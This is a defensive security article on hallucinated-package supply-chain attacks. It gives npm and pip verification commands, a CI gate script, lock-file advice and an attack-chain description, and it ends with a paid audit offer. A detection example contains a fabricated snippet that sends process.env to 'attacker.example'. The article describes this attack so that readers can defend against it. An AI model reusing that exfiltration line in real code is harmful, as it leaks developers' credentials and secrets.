The Attack Vector You Are Not Thinking About
AI coding tools hallucinate. When they hallucinate a function call, you get a runtime error. When they hallucinate a package name, you get a supply chain attack.
Here is how it works. You ask your AI coding tool to add PDF generation to your app. The tool suggests installing a package called pdf-render-utils. The name sounds plausible. The install command looks right. You run npm install pdf-render-utils.
Except pdf-render-utils does not exist. The AI hallucinated it. But an attacker who has been monitoring AI hallucination patterns registered that exact name on npm yesterday. The package you just installed contains code that exfiltrates your environment variables, including your database credentials and API keys, to a server controlled by the attacker.
This is not theoretical. Security researchers have documented this attack vector extensively. In a 2024 study, researchers found that AI coding tools hallucinate package names in approximately 5% of suggestions. Attackers are actively registering these phantom packages.
Verifying npm Packages
Before you install any package an AI tool suggests, verify it exists and is legitimate.
Step 1: Check if the Package Exists
# Check if a package exists on npm
npm view pdf-render-utils
# If the package does not exist, you will see:
# npm ERR! code E404
# npm ERR! 404 Not Found
# If it exists, you will see package metadata
Step 2: Check Download Counts and Age
# View package details including creation date
npm view pdf-render-utils time
# Check weekly downloads (use the npm website)
# https://www.npmjs.com/package/pdf-render-utils
# RED FLAGS:
# - Package created in the last 30 days
# - Fewer than 100 weekly downloads
# - No linked GitHub/GitLab repository
# - Author has no other published packages
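The 30-day red flag is easy to script. A minimal sketch, assuming GNU date; the creation timestamp would normally come from npm view, but is hard-coded here so the example runs offline:

```shell
# Flag packages created within the last 30 days.
# CREATED is hard-coded for the example; in practice:
#   CREATED=$(npm view <package> time.created)
CREATED="2024-01-15T10:00:00.000Z"

NOW=$(date -u +%s)
CREATED_S=$(date -u -d "${CREATED%%.*}" +%s)   # GNU date; on macOS use `date -j -f`
AGE_DAYS=$(( (NOW - CREATED_S) / 86400 ))

if [ "$AGE_DAYS" -lt 30 ]; then
  echo "RED FLAG: package is only $AGE_DAYS days old"
else
  echo "Package age: $AGE_DAYS days"
fi
```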
Step 3: Inspect Before Installing
# Download the package without installing (inspect first)
npm pack pdf-render-utils
# This downloads a .tgz file you can extract and review
# Look for suspicious code in:
# - postinstall scripts (package.json "scripts" section)
# - index.js or main entry point
# - Any network calls (http, https, fetch, axios)
# Check if the package has install scripts
npm view pdf-render-utils scripts
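The scripts check also works against a tarball you have already unpacked with npm pack. A sketch using a fabricated package.json in place of a real extracted tarball, so it runs without touching the registry:

```shell
# Fabricated package.json standing in for the contents of an extracted tarball
mkdir -p package
cat > package/package.json <<'EOF'
{
  "name": "pdf-render-utils",
  "version": "1.0.0",
  "scripts": { "postinstall": "node collect.js" }
}
EOF

# Lifecycle scripts that run automatically during `npm install`
if grep -E '"(preinstall|install|postinstall)"' package/package.json; then
  echo "WARNING: install-time scripts found -- read them before installing"
fi
```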
Be especially wary of postinstall scripts: they execute automatically the moment you run npm install. By the time you notice the package is suspicious, the malicious code has already run. Always verify before installing.
Verifying pip Packages (Python)
Step 1: Check if the Package Exists
# Check if a package exists on PyPI
pip index versions pdf-render-utils  # requires pip 21.2 or newer
# Or check the PyPI website directly
# https://pypi.org/project/pdf-render-utils/
# If the page returns 404, the package does not exist
# If the AI suggested it and it does not exist, the name was hallucinated
Step 2: Review Package Metadata
# Download without installing
pip download pdf-render-utils --no-deps -d ./review/
# Inspect the downloaded file
# For .whl files, rename to .zip and extract
# For .tar.gz files, extract normally
# Check setup.py or pyproject.toml for:
# - install_requires (unexpected dependencies)
# - cmdclass (custom install commands)
# - Any code that runs during installation
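Those checks reduce to a grep over the extracted archive. A sketch with a fabricated setup.py standing in for a downloaded sdist; an import of urllib in a setup script is exactly the kind of thing to catch:

```shell
# Fabricated setup.py standing in for an extracted sdist under ./review/
mkdir -p review/pkg
cat > review/pkg/setup.py <<'EOF'
from setuptools import setup
import urllib.request  # a setup script has no business making network calls
setup(name="pdf-render-utils")
EOF

# Patterns worth flagging in install-time code
grep -rnE 'urllib|requests|socket|subprocess|base64|eval\(|exec\(' review/pkg/ \
  && echo "Review every match above before installing."
```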
Step 3: Check the Package History
# Use pip-audit to check for known vulnerabilities
pip install pip-audit
pip-audit
# Check package creation date on PyPI
# Visit https://pypi.org/project/PACKAGE_NAME/#history
# Look at the release history
# RED FLAGS:
# - Only one release (version 0.1.0 or 1.0.0)
# - Published within the last 30 days
# - No source code repository linked
# - Description copied from a well-known package
# - Author email uses a free email provider
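Most of these red flags can be read straight out of PyPI's JSON API (https://pypi.org/pypi/PACKAGE_NAME/json). A sketch against a fabricated response so it runs offline; in practice you would fetch the real one with curl:

```shell
# Fabricated response from https://pypi.org/pypi/<package>/json
# (in practice: curl -s https://pypi.org/pypi/<package>/json > meta.json)
cat > meta.json <<'EOF'
{"info": {"project_urls": null}, "releases": {"0.1.0": []}}
EOF

RELEASES=$(python3 -c "import json; print(len(json.load(open('meta.json'))['releases']))")
REPO=$(python3 -c "import json; d=json.load(open('meta.json')); print(d['info']['project_urls'] or 'none')")

if [ "$RELEASES" -le 1 ]; then echo "RED FLAG: only $RELEASES release"; fi
if [ "$REPO" = "none" ]; then echo "RED FLAG: no linked source repository"; fi
```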
The Hallucinated Dependency Attack in Detail
Understanding the full attack chain helps you recognize the risk:
- Reconnaissance. Attackers use AI coding tools with common prompts and log every package name the AI suggests. They filter for names that return 404 on npm or PyPI.
- Registration. The attacker registers the hallucinated package name on the official registry. The package description mimics what the AI described it as. The code looks plausible at a glance.
- Payload. The package contains a postinstall script (npm) or setup.py hook (pip) that runs automatically during installation. The payload typically reads environment variables, searches for .env files and exfiltrates credentials to an attacker-controlled server.
- Waiting. The attacker waits. Every developer who uses the same AI tool and gets the same hallucinated suggestion will install the malicious package.
- Impact. The attacker gains access to database credentials, API keys, cloud provider tokens and any other secrets stored in environment variables. From there, they access production databases, cloud infrastructure and third-party services.
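A payload of the shape described in the Payload step leaves a recognizable fingerprint: code that reads process.env and also opens an outbound connection. A rough detection sketch, run here against a fabricated suspect file rather than a real package:

```shell
# Fabricated file mimicking the exfiltration pattern described above
mkdir -p suspect
cat > suspect/index.js <<'EOF'
const https = require("https");
https.request({ host: "attacker.example", method: "POST" })
     .end(JSON.stringify(process.env));
EOF

# Flag files that both read environment variables and make network calls
grep -rlE 'process\.env' suspect/ | while read -r f; do
  if grep -qE 'https?\.request|fetch\(|axios' "$f"; then
    echo "SUSPICIOUS: $f reads env vars and opens network connections"
  fi
done
```

The two-pattern match is crude and will miss obfuscated payloads (base64-encoded hosts, dynamic requires), but it catches the naive version of this attack in seconds.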
Automated Protection
Manual verification works but does not scale. Here are automated approaches for teams.
CI/CD Package Verification Gate
#!/bin/bash
# ci-verify-packages.sh
# Add to your CI/CD pipeline before npm install
echo "Verifying all packages in package.json..."
# Extract package names from package.json
PACKAGES=$(node -e "
const pkg = require('./package.json');
const deps = Object.keys(pkg.dependencies || {});
const devDeps = Object.keys(pkg.devDependencies || {});
console.log([...deps, ...devDeps].join('\n'));
")
FAILED=0
for PKG in $PACKAGES; do
if ! npm view "$PKG" name >/dev/null 2>&1; then
echo "ERROR: Package '$PKG' not found on npm registry"
FAILED=1
fi
done
if [ $FAILED -eq 1 ]; then
echo "Build blocked: unverifiable packages detected"
exit 1
fi
echo "All packages verified."
Use Lock Files and Integrity Hashes
# npm: always use package-lock.json
# The lock file includes integrity hashes for every package
npm ci # Use ci instead of install in CI/CD
# This enforces the lock file exactly
# Python: use pip with hash verification
pip install --require-hashes -r requirements.txt
# Generate requirements with hashes:
pip-compile --generate-hashes requirements.in
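The integrity values that npm ci enforces are Subresource Integrity strings: an algorithm tag plus the base64 digest of the tarball. You can reproduce one by hand to see what is being compared (openssl assumed; the file here is a stand-in for a real .tgz):

```shell
# Stand-in for a downloaded tarball
printf 'fake tarball bytes' > pkg.tgz

# Same shape as the "integrity" field in package-lock.json
INTEGRITY="sha512-$(openssl dgst -sha512 -binary pkg.tgz | openssl base64 -A)"
echo "$INTEGRITY"
```

If an attacker replaces a published tarball, the digest changes and npm ci refuses to install, which is why committing the lock file matters.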
Quick Reference Checklist
Before installing any AI-suggested package:
- Run npm view package-name or check pypi.org/project/package-name
- Verify the package has been published for more than 30 days
- Check that weekly downloads are reasonable (not single digits)
- Confirm a linked source code repository exists
- Review the package for postinstall scripts
- Consider whether a well-known alternative exists for the same functionality
If the package fails any of these checks, do not install it. Ask your AI tool for an alternative and verify that one too.
For a comprehensive dependency security review as part of a full application audit, scope a vibe coding security audit starting at $1,500 CAD. For the full set of security prompts you can paste into your AI coding tool, visit our AI Security Prompt Library.